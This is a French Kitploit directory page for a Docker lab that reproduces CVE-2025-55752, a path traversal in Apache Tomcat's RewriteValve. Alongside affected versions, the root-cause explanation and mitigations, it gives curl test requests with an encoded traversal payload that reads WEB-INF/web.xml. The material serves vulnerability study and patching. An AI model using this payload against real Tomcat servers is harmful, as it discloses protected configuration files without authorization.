Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/masahiro331/cve-2025-55752
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

# Environnement de reproduction basé sur Docker pour CVE-2025-55752, une vulnérabilité de traversée de chemin dans RewriteValve d'Apache Tomcat, démontrant le défaut de normalisation avant décodage et fournissant des commandes de test.

Voir le dépôt
1433il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55752 : Vulnérabilité de traversée de chemin dans Apache Tomcat

Environnement de reproduction basé sur Docker pour CVE-2025-55752, une vulnérabilité de traversée de chemin dans Apache Tomcat 10.1.44.

Vue d'ensemble

CVE-2025-55752 est une vulnérabilité de traversée de chemin dans le RewriteValve d'Apache Tomcat causée par un traitement incorrect de l'ordre : la normalisation de l'URL se produit avant le décodage de l'URL. Cela permet aux attaquants de contourner les contraintes de sécurité protégeant des répertoires comme /WEB-INF/ à l'aide de séquences de traversée de chemin encodées dans l'URL (..%2f).

Caractéristiques de la vulnérabilité

  • ID CVE : CVE-2025-55752
  • CVSS v3.1 : 7.5 (ÉLEVÉE)
  • CWE : CWE-22 (Traversée de chemin)
  • Composant : RewriteValve d'Apache Tomcat
  • Cause racine : Ordre de traitement normaliser-avant-décoder

Versions concernées

SérieVersions vulnérablesVersion corrigée
11.x11.0.0-M1 à 11.0.1011.0.11+
10.1.x10.1.0-M1 à 10.1.4410.1.45+
9.0.x9.0.0-M11 à 9.0.1089.0.109+
8.5.x8.5.6 à 8.5.100EOL - Aucun correctif

Démarrage rapide

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

Test de la vulnérabilité

Test 1 : Accès direct à WEB-INF (Protégé)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

Résultat attendu : 403 Forbidden

Test 2 : Divulgation d'informations (Lecture de fichiers protégés)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

Résultat attendu : 200 OK + contenu de web.xml (vulnérabilité confirmée)

Comment cela fonctionne

  1. Requête : /download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve réécrit vers : /files/..%2fWEB-INF%2fweb.xml
  3. Normalisation de l'URL (avant décodage) : %2f non reconnu comme /, .. survit
  4. Décodage de l'URL : %2f → / → /files/../WEB-INF/web.xml
  5. Résolution du chemin : /WEB-INF/web.xml

Problème d'ordre de traitement

root@kitploit:~
Correct :    Décoder → Normaliser → Contrôle de sécurité
Vulnérable : Normaliser → Décoder → Contrôle de sécurité ✗

Correctif Tomcat

  • GitHub : apache/tomcat commit 130d36d8
  • Correctif : Décoder avant de normaliser

Atténuation

  1. Désactiver RewriteValve s'il n'est pas requis
  2. Désactiver la méthode PUT
  3. Règles WAF pour bloquer ../ et %2e%2e
  4. Mettre à niveau vers les versions corrigées (10.1.45+, 9.0.109+, 11.0.11+)

Références

  • Sécurité Apache Tomcat
  • NVD - CVE-2025-55752
  • Traversée de chemin OWASP
  • CWE-22 : Limitation incorrecte d'un nom de chemin

Avertissement

⚠️ AVERTISSEMENT : Ne pas déployer en production. Utiliser uniquement dans des environnements de test isolés.

Télécharger l’outil